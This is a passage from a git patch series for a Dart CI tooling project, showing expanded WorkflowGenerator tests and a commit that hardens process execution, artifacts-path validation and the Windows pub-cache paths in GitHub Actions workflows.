File('${configDir.path}/config.json').writeAsStringSync(json.encode({'repo_name': 'test_repo'})); final result = WorkflowGenerator.loadCiConfig(tempDir.path); expect(result, isNull); }); @@ -1357,35 +1142,19 @@ void main() { test('throws StateError on malformed JSON', () { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File( - '${configDir.path}/config.json', - ).writeAsStringSync('{ not valid json'); + File('${configDir.path}/config.json').writeAsStringSync('{ not valid json'); expect( () => WorkflowGenerator.loadCiConfig(tempDir.path), - throwsA( - isA().having( - (e) => e.message, - 'message', - contains('Malformed JSON'), - ), - ), + throwsA(isA().having((e) => e.message, 'message', contains('Malformed JSON'))), ); }); test('throws StateError when "ci" is not a Map', () { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File( - '${configDir.path}/config.json', - ).writeAsStringSync(json.encode({'ci': 'not_a_map'})); + File('${configDir.path}/config.json').writeAsStringSync(json.encode({'ci': 'not_a_map'})); expect( () => WorkflowGenerator.loadCiConfig(tempDir.path), - throwsA( - isA().having( - (e) => e.message, - 'message', - contains('object'), - ), - ), + throwsA(isA().having((e) => e.message, 'message', contains('object'))), ); }); @@ -1396,10 +1165,7 @@ void main() { 'ci': [1, 2, 3], }), ); - expect( - () => WorkflowGenerator.loadCiConfig(tempDir.path), - throwsA(isA()), - ); + expect(() => WorkflowGenerator.loadCiConfig(tempDir.path), throwsA(isA())); }); }); @@ -1436,58 +1202,37 @@ void main() { } // ---- render() validation guard (defense-in-depth) ---- - test( - 'render throws StateError when config is invalid (missing dart_sdk)', - () { - final gen = WorkflowGenerator( - ciConfig: {'features': {}}, - toolingVersion: '0.0.0-test', - ); - expect( - () => gen.render(), - throwsA( - isA().having( - (e) => e.message, - 'message', - allOf( - contains('Cannot render with invalid config'), - 
contains('dart_sdk'), - ), - ), + test('render throws StateError when config is invalid (missing dart_sdk)', () { + final gen = WorkflowGenerator(ciConfig: {'features': {}}, toolingVersion: '0.0.0-test'); + expect( + () => gen.render(), + throwsA( + isA().having( + (e) => e.message, + 'message', + allOf(contains('Cannot render with invalid config'), contains('dart_sdk')), ), - ); - }, - ); + ), + ); + }); - test( - 'render throws StateError when config has multiple validation errors', - () { - final gen = WorkflowGenerator( - ciConfig: {}, - toolingVersion: '0.0.0-test', - ); - expect( - () => gen.render(), - throwsA( - isA().having( - (e) => e.message, - 'message', - allOf( - contains('Cannot render with invalid config'), - contains('dart_sdk'), - contains('features'), - ), - ), + test('render throws StateError when config has multiple validation errors', () { + final gen = WorkflowGenerator(ciConfig: {}, toolingVersion: '0.0.0-test'); + expect( + () => gen.render(), + throwsA( + isA().having( + (e) => e.message, + 'message', + allOf(contains('Cannot render with invalid config'), contains('dart_sdk'), contains('features')), ), - ); - }, - ); + ), + ); + }); test('render throws StateError when config has invalid web_test type', () { final gen = WorkflowGenerator( - ciConfig: _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': true}, - )..['web_test'] = 'yes', + ciConfig: _validConfig(features: {'proto': false, 'lfs': false, 'web_test': true})..['web_test'] = 'yes', toolingVersion: '0.0.0-test', ); expect( @@ -1496,49 +1241,42 @@ void main() { isA().having( (e) => e.message, 'message', - allOf( - contains('Cannot render with invalid config'), - contains('web_test must be an object'), - ), + allOf(contains('Cannot render with invalid config'), contains('web_test must be an object')), ), ), ); }); test('render succeeds on valid config', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(webTest: false), - toolingVersion: 
'0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(webTest: false), toolingVersion: '0.0.0-test'); final rendered = gen.render(); expect(rendered, isNotEmpty); - expect(rendered, contains('name:')); + final parsed = loadYaml(rendered) as YamlMap; + expect(parsed, isA()); + expect(parsed.containsKey('name'), isTrue); + expect(parsed['name'], equals('CI')); + expect(parsed.containsKey('jobs'), isTrue); + final jobs = parsed['jobs'] as YamlMap; + expect(jobs, isA()); + expect(jobs.containsKey('pre-check'), isTrue); + expect(jobs.containsKey('analyze-and-test'), isTrue); }); test('web_test=false: rendered output does not contain web-test job', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(webTest: false), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(webTest: false), toolingVersion: '0.0.0-test'); final rendered = gen.render(); expect(rendered, isNot(contains('web-test:'))); expect(rendered, isNot(contains('dart test -p chrome'))); }); - test( - 'web_test=true with omitted config uses default concurrency and no explicit paths', - () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(webTest: true), - toolingVersion: '0.0.0-test', - ); - final rendered = gen.render(); - expect(rendered, contains('web-test:')); - expect(rendered, contains('dart test -p chrome')); - expect(rendered, contains('--concurrency=1')); - expect(rendered, isNot(contains("'test/"))); - }, - ); + test('web_test=true with omitted config uses default concurrency and no explicit paths', () { + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(webTest: true), toolingVersion: '0.0.0-test'); + final rendered = gen.render(); + expect(rendered, contains('web-test:')); + expect(rendered, contains('dart test -p chrome')); + expect(rendered, contains('--concurrency=1')); + expect(rendered, isNot(contains("'test/"))); + }); test('web_test=true with paths: rendered output includes 
path args', () { final gen = WorkflowGenerator( @@ -1557,30 +1295,67 @@ void main() { expect(rendered, contains('-- \'test/web/foo_test.dart\'')); }); - test( - 'web_test=true with concurrency at upper bound (32): rendered output uses 32', - () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - webTest: true, - webTestConfig: {'concurrency': 32}, - ), - toolingVersion: '0.0.0-test', - ); - final rendered = gen.render(); - expect(rendered, contains('--concurrency=32')); - }, - ); - - test('rendered output parses as valid YAML with jobs map', () { + test('web_test=true with concurrency at upper bound (32): rendered output uses 32', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), + ciConfig: _minimalValidConfig(webTest: true, webTestConfig: {'concurrency': 32}), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); + expect(rendered, contains('--concurrency=32')); + }); + + test('rendered output parses as valid YAML with jobs map', () { + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); + final rendered = gen.render(); final parsed = loadYaml(rendered) as YamlMap; + + expect(parsed.containsKey('name'), isTrue); + expect(parsed['name'], equals('CI')); + + final on = parsed['on'] as YamlMap; + expect(on.containsKey('push'), isTrue); + expect(on.containsKey('pull_request'), isTrue); + final pushBranches = (on['push'] as YamlMap)['branches'] as YamlList; + expect(pushBranches, contains('main')); + final jobs = parsed['jobs'] as YamlMap; expect(jobs.containsKey('pre-check'), isTrue); + + final preCheck = jobs['pre-check'] as YamlMap; + expect(preCheck['runs-on'], equals('ubuntu-latest')); + final steps = preCheck['steps'] as YamlList; + expect(steps.length, greaterThanOrEqualTo(2)); + final firstStep = steps[0] as YamlMap; + expect('${firstStep['uses']}', contains('actions/checkout')); + }); + + test('managed_test: upload step uses success() || failure() not cancelled', () { + 
final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(featureOverrides: {'managed_test': true}), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains('success() || failure()')); + expect(rendered, isNot(contains('always()'))); + }); + + test('managed_test: Test step has pipefail and tee for correct exit propagation', () { + // Single-platform and multi-platform must share identical test step + // structure: pipefail ensures test exit code propagates through tee. + final single = WorkflowGenerator( + ciConfig: _minimalValidConfig(featureOverrides: {'managed_test': true}, platforms: ['ubuntu']), + toolingVersion: '0.0.0-test', + ).render(); + final multi = WorkflowGenerator( + ciConfig: _minimalValidConfig(featureOverrides: {'managed_test': true}, platforms: ['ubuntu', 'macos']), + toolingVersion: '0.0.0-test', + ).render(); + for (final rendered in [single, multi]) { + expect(rendered, contains('set -o pipefail')); + expect(rendered, contains('tee "')); + expect(rendered, contains('console.log"')); + expect(rendered, contains('manage_cicd test 2>&1')); + } }); test('feature flags render expected snippets', () { @@ -1638,10 +1413,7 @@ void main() { // ---- render(existingContent) / _preserveUserSections ---- group('render(existingContent) preserves user sections', () { test('user section content is preserved when existingContent has custom lines in a user block', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final base = gen.render(); // Append a user block with content so extraction finds it (first occurrence is empty) const customBlock = ''' @@ -1659,10 +1431,7 @@ void main() { }); test('CRLF normalization: existing content with \\r\\n still preserves sections', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: 
'0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final base = gen.render(); const customContent = '\r\n - run: echo "crlf-test"\r\n'; final existing = base.replaceFirst( @@ -1675,10 +1444,7 @@ void main() { }); test('multiple user sections preserve independently', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final base = gen.render(); var existing = base; existing = existing.replaceFirst( @@ -1701,10 +1467,7 @@ void main() { }); test('empty/whitespace-only existing user section does not overwrite rendered section', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final base = gen.render(); // Existing has pre-test with only whitespace; post-test has real content final existing = base @@ -1718,19 +1481,13 @@ void main() { ); final rendered = gen.render(existingContent: existing); // pre-test: whitespace-only was skipped, so rendered keeps empty placeholder - expect( - rendered, - contains('# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---'), - ); + expect(rendered, contains('# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---')); // post-test: real content was preserved expect(rendered, contains('echo kept')); }); test('unknown section name in existing content is silently ignored', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final base = gen.render(); // Add a user section that doesn't exist in the skeleton final existing = '$base\n# --- BEGIN USER: nonexistent ---\n custom: stuff\n# --- END USER: nonexistent 
---\n'; @@ -1743,10 +1500,7 @@ void main() { }); test('malformed section markers (missing END) are ignored', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final base = gen.render(); // Inject a BEGIN without matching END — regex won't match, so it's ignored final existing = base.replaceFirst( @@ -1759,10 +1513,7 @@ void main() { }); test('mismatched section names (BEGIN X / END Y) are ignored', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final base = gen.render(); final existing = base.replaceFirst( '# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---', @@ -1774,10 +1525,7 @@ void main() { }); test('section content with regex-special characters is preserved verbatim', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final base = gen.render(); // Content with regex special chars: $, (), *, +, ?, |, ^, {, } const specialContent = r' - run: echo "${{ matrix.os }}" && test [[ "$(whoami)" == "ci" ]]'; @@ -1790,20 +1538,14 @@ void main() { }); test('null existingContent produces same output as no existingContent', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final withoutExisting = gen.render(); final withNull = gen.render(existingContent: null); expect(withNull, equals(withoutExisting)); }); test('existingContent with no user sections produces same output as fresh render', () { - final gen = WorkflowGenerator( - ciConfig: 
_minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final fresh = gen.render(); // Use a completely unrelated string as existing content final rendered = gen.render(existingContent: 'name: SomeOtherWorkflow\non: push'); @@ -1815,10 +1557,7 @@ void main() { group('feature flag combinations', () { test('format_check + web_test: web-test needs includes auto-format', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - webTest: true, - featureOverrides: {'format_check': true}, - ), + ciConfig: _minimalValidConfig(webTest: true, featureOverrides: {'format_check': true}), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); @@ -1830,10 +1569,7 @@ void main() { }); test('web_test without format_check: web-test needs omits auto-format', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(webTest: true), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(webTest: true), toolingVersion: '0.0.0-test'); final rendered = gen.render(); final parsed = loadYaml(rendered) as YamlMap; final webTestJob = parsed['jobs']['web-test'] as YamlMap; @@ -1844,10 +1580,7 @@ void main() { test('build_runner + web_test: web-test job contains build_runner step', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - webTest: true, - featureOverrides: {'build_runner': true}, - ), + ciConfig: _minimalValidConfig(webTest: true, featureOverrides: {'build_runner': true}), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); @@ -1860,10 +1593,7 @@ void main() { test('proto + web_test: web-test job contains proto steps', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - webTest: true, - featureOverrides: {'proto': true}, - ), + ciConfig: _minimalValidConfig(webTest: true, featureOverrides: {'proto': true}), toolingVersion: '0.0.0-test', ); final rendered = 
gen.render(); @@ -1876,10 +1606,7 @@ void main() { test('multi-platform + web_test: web-test depends on analyze (not test)', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - webTest: true, - platforms: ['ubuntu', 'macos'], - ), + ciConfig: _minimalValidConfig(webTest: true, platforms: ['ubuntu', 'macos']), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); @@ -1891,12 +1618,9 @@ void main() { expect(needs, isNot(contains('analyze-and-test'))); }); - test('single-platform + web_test: web-test does not depend on analyze-and-test', () { + test('single-platform + web_test: web-test depends on analyze-and-test', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - webTest: true, - platforms: ['ubuntu'], - ), + ciConfig: _minimalValidConfig(webTest: true, platforms: ['ubuntu']), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); @@ -1904,13 +1628,12 @@ void main() { final webTestJob = parsed['jobs']['web-test'] as YamlMap; final needs = (webTestJob['needs'] as YamlList).toList(); expect(needs, contains('pre-check')); - expect(needs, isNot(contains('analyze-and-test'))); + expect(needs, contains('analyze-and-test')); }); test('secrets render in web-test job env block', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(webTest: true) - ..['secrets'] = {'API_KEY': 'MY_SECRET'}, + ciConfig: _minimalValidConfig(webTest: true)..['secrets'] = {'API_KEY': 'MY_SECRET'}, toolingVersion: '0.0.0-test', ); final rendered = gen.render(); @@ -1923,10 +1646,7 @@ void main() { test('lfs + web_test: web-test checkout has lfs: true', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - webTest: true, - featureOverrides: {'lfs': true}, - ), + ciConfig: _minimalValidConfig(webTest: true, featureOverrides: {'lfs': true}), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); @@ -1938,20 +1658,14 @@ void main() { test('managed_test in multi-platform: test job uses managed test 
command', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - featureOverrides: {'managed_test': true}, - platforms: ['ubuntu', 'macos'], - ), + ciConfig: _minimalValidConfig(featureOverrides: {'managed_test': true}, platforms: ['ubuntu', 'macos']), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); final parsed = loadYaml(rendered) as YamlMap; final testJob = parsed['jobs']['test'] as YamlMap; final steps = (testJob['steps'] as YamlList).toList(); - final testStep = steps.firstWhere( - (s) => s is YamlMap && s['name'] == 'Test', - orElse: () => null, - ); + final testStep = steps.firstWhere((s) => s is YamlMap && s['name'] == 'Test', orElse: () => null); expect(testStep, isNotNull); expect((testStep as YamlMap)['run'], contains('manage_cicd test')); }); @@ -1960,7 +1674,10 @@ void main() { final gen = WorkflowGenerator( ciConfig: _minimalValidConfig( webTest: true, - webTestConfig: {'concurrency': 4, 'paths': ['test/web/']}, + webTestConfig: { + 'concurrency': 4, + 'paths': ['test/web/'], + }, featureOverrides: { 'proto': true, 'lfs': true, @@ -1993,10 +1710,7 @@ void main() { }); test('no features enabled (all false) renders minimal valid YAML', () { - final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(), - toolingVersion: '0.0.0-test', - ); + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final rendered = gen.render(); final parsed = loadYaml(rendered) as YamlMap; final jobs = parsed['jobs'] as YamlMap; @@ -2037,6 +1751,29 @@ void main() { final job = parsed['jobs']['analyze-and-test'] as YamlMap; expect(job['runs-on'], equals('my-custom-runner')); }); + + test('artifact retention-days policy applied consistently (7 days)', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(featureOverrides: {'managed_test': true}), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains('retention-days: 7')); + expect(rendered, 
contains('Policy: test artifact retention-days = 7')); + }); + + test('Windows pub-cache path uses format for Dart default (%LOCALAPPDATA%\\Pub\\Cache)', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(platforms: ['windows']), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains('Pub')); + expect(rendered, contains('Cache')); + expect(rendered, contains('env.LOCALAPPDATA')); + expect(rendered, contains("'~/.pub-cache'")); + expect(rendered, contains("runner.os == 'Windows'")); + }); }); }); } From 6e0466663cd0b257d5873898e4693f1bbc30538f Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 22:02:05 -0500 Subject: [PATCH 12/16] fix: harden process execution and runtime config boundaries Address post-review reliability and safety gaps by adding timeout-safe process execution with explicit kill semantics, bounded output capture, and fatal-path flush behavior. Also harden runtime sub-package loading with workflow-equivalent validation, align Windows pub-cache path handling across workflow templates, and gate issue-triage npm installation behind trigger conditions. Expand utility coverage for timeout handling, fatal-exit probe behavior, and runtime sub-package validation paths. 
--- .github/workflows/issue-triage.yaml | 3 +- .github/workflows/release.yaml | 16 +- .../cli/commands/create_release_command.dart | 57 ++- lib/src/cli/commands/update_all_command.dart | 9 +- lib/src/cli/utils/process_runner.dart | 124 +++++- lib/src/cli/utils/sub_package_utils.dart | 26 +- lib/src/cli/utils/tool_installers.dart | 30 +- lib/src/cli/utils/workflow_generator.dart | 33 ++ .../workflows/issue-triage.template.yaml | 3 +- .../github/workflows/release.template.yaml | 16 +- test/cli_utils_test.dart | 353 ++++++++++++++---- test/scripts/fatal_exit_probe.dart | 14 + 12 files changed, 554 insertions(+), 130 deletions(-) create mode 100644 test/scripts/fatal_exit_probe.dart diff --git a/.github/workflows/issue-triage.yaml b/.github/workflows/issue-triage.yaml index f632fc7..770bd69 100644 --- a/.github/workflows/issue-triage.yaml +++ b/.github/workflows/issue-triage.yaml @@ -67,7 +67,7 @@ jobs: if: steps.trigger.outputs.run == 'true' uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -80,6 +80,7 @@ jobs: node-version: "22" - run: npm install -g @google/gemini-cli@latest + if: steps.trigger.outputs.run == 'true' - name: Cache Go modules (GitHub MCP server) if: steps.trigger.outputs.run == 'true' diff --git a/.github/workflows/release.yaml b/.github/workflows/release.yaml index c13875b..78511ad 100644 --- a/.github/workflows/release.yaml +++ b/.github/workflows/release.yaml @@ -84,7 +84,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: 
${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -158,7 +158,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -242,7 +242,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -333,7 +333,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -438,7 +438,7 @@ jobs: - name: Cache Dart pub uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-pub-${{ hashFiles('**/pubspec.lock') }} restore-keys: ${{ runner.os }}-pub- @@ -538,7 +538,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || 
'~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -679,7 +679,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -805,7 +805,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- diff --git a/lib/src/cli/commands/create_release_command.dart b/lib/src/cli/commands/create_release_command.dart index 6348b90..3d22561 100644 --- a/lib/src/cli/commands/create_release_command.dart +++ b/lib/src/cli/commands/create_release_command.dart @@ -2,6 +2,7 @@ import 'dart:convert'; import 'dart:io'; import 'package:args/command_runner.dart'; +import 'package:path/path.dart' as p; import 'package:pub_semver/pub_semver.dart'; import '../../triage/utils/config.dart'; @@ -70,7 +71,12 @@ class CreateReleaseCommand extends Command { // Step 1: Copy artifacts if provided if (artifactsDir != null) { - final artDir = Directory('$repoRoot/$artifactsDir'); + final artifactsPath = p.normalize(p.join(repoRoot, artifactsDir)); + if (!(artifactsPath == repoRoot || p.isWithin(repoRoot, artifactsPath))) { + Logger.error('--artifacts-dir must resolve within the repository root'); + exit(1); + } + final artDir = Directory(artifactsPath); if (artDir.existsSync()) { for (final name in ['CHANGELOG.md', 'README.md']) { final src = 
File('${artDir.path}/$name'); @@ -236,8 +242,13 @@ class CreateReleaseCommand extends Command { // Step 4: Commit all changes Logger.info('Configuring git identity for release commit'); - CiProcessRunner.exec('git', ['config', 'user.name', 'github-actions[bot]'], cwd: repoRoot, verbose: global.verbose); - CiProcessRunner.exec( + await CiProcessRunner.exec( + 'git', + ['config', 'user.name', 'github-actions[bot]'], + cwd: repoRoot, + verbose: global.verbose, + ); + await CiProcessRunner.exec( 'git', ['config', 'user.email', 'github-actions[bot]@users.noreply.github.com'], cwd: repoRoot, @@ -264,7 +275,7 @@ class CreateReleaseCommand extends Command { for (final path in filesToAdd) { final fullPath = '$repoRoot/$path'; if (File(fullPath).existsSync() || Directory(fullPath).existsSync()) { - CiProcessRunner.exec('git', ['add', path], cwd: repoRoot, verbose: global.verbose); + await CiProcessRunner.exec('git', ['add', path], cwd: repoRoot, verbose: global.verbose); } } @@ -281,7 +292,7 @@ class CreateReleaseCommand extends Command { // Use a temp file for the commit message to avoid shell escaping issues final commitMsgFile = File('$repoRoot/.git/RELEASE_COMMIT_MSG'); commitMsgFile.writeAsStringSync(commitMsg); - CiProcessRunner.exec( + await CiProcessRunner.exec( 'git', ['commit', '-F', commitMsgFile.path], cwd: repoRoot, @@ -295,7 +306,7 @@ class CreateReleaseCommand extends Command { final remoteRepo = Platform.environment['GITHUB_REPOSITORY'] ?? 
effectiveRepo; if (ghToken != null && remoteRepo.isNotEmpty) { Logger.info('Setting authenticated remote URL for push'); - CiProcessRunner.exec( + await CiProcessRunner.exec( 'git', ['remote', 'set-url', 'origin', 'https://x-access-token:$ghToken@github.com/$remoteRepo.git'], cwd: repoRoot, @@ -311,15 +322,27 @@ class CreateReleaseCommand extends Command { if (pushResult.exitCode != 0) { Logger.warn('Direct push failed (non-fast-forward); fetching and merging remote changes...'); if (global.verbose) Logger.info(' push stderr: ${(pushResult.stderr as String).trim()}'); - CiProcessRunner.exec('git', ['fetch', 'origin', 'main'], cwd: repoRoot, fatal: true, verbose: global.verbose); - CiProcessRunner.exec( + await CiProcessRunner.exec( + 'git', + ['fetch', 'origin', 'main'], + cwd: repoRoot, + fatal: true, + verbose: global.verbose, + ); + await CiProcessRunner.exec( 'git', ['merge', 'origin/main', '--no-edit'], cwd: repoRoot, fatal: true, verbose: global.verbose, ); - CiProcessRunner.exec('git', ['push', 'origin', 'main'], cwd: repoRoot, fatal: true, verbose: global.verbose); + await CiProcessRunner.exec( + 'git', + ['push', 'origin', 'main'], + cwd: repoRoot, + fatal: true, + verbose: global.verbose, + ); } Logger.success('Committed and pushed changes'); } else { @@ -333,14 +356,14 @@ class CreateReleaseCommand extends Command { Logger.error('Tag $tag already exists. 
Cannot create release.'); exit(1); } - CiProcessRunner.exec( + await CiProcessRunner.exec( 'git', ['tag', '-a', tag, '-m', 'Release v$newVersion'], cwd: repoRoot, fatal: true, verbose: global.verbose, ); - CiProcessRunner.exec('git', ['push', 'origin', tag], cwd: repoRoot, fatal: true, verbose: global.verbose); + await CiProcessRunner.exec('git', ['push', 'origin', tag], cwd: repoRoot, fatal: true, verbose: global.verbose); Logger.success('Created tag: $tag'); // Step 5b: Create per-package tags for sub-packages with tag_pattern @@ -356,14 +379,20 @@ class CreateReleaseCommand extends Command { continue; } try { - CiProcessRunner.exec( + await CiProcessRunner.exec( 'git', ['tag', '-a', pkgTag, '-m', '${pkg['name']} v$newVersion'], cwd: repoRoot, fatal: true, verbose: global.verbose, ); - CiProcessRunner.exec('git', ['push', 'origin', pkgTag], cwd: repoRoot, fatal: true, verbose: global.verbose); + await CiProcessRunner.exec( + 'git', + ['push', 'origin', pkgTag], + cwd: repoRoot, + fatal: true, + verbose: global.verbose, + ); pkgTagsCreated.add(pkgTag); } catch (e) { Logger.error('Failed to create per-package tag $pkgTag: $e'); @@ -400,7 +429,7 @@ class CreateReleaseCommand extends Command { final ghArgs = ['release', 'create', tag, '--title', 'v$newVersion', '--notes', releaseBody]; if (effectiveRepo.isNotEmpty) ghArgs.addAll(['--repo', effectiveRepo]); - CiProcessRunner.exec('gh', ghArgs, cwd: repoRoot, verbose: global.verbose); + await CiProcessRunner.exec('gh', ghArgs, cwd: repoRoot, verbose: global.verbose); Logger.success('Created GitHub Release: $tag'); // Build rich summary diff --git a/lib/src/cli/commands/update_all_command.dart b/lib/src/cli/commands/update_all_command.dart index 189302d..74de8f6 100644 --- a/lib/src/cli/commands/update_all_command.dart +++ b/lib/src/cli/commands/update_all_command.dart @@ -1,6 +1,5 @@ // ignore_for_file: avoid_print -import 'dart:async'; import 'dart:io'; import 'package:args/command_runner.dart'; @@ -10,6 +9,7 @@ 
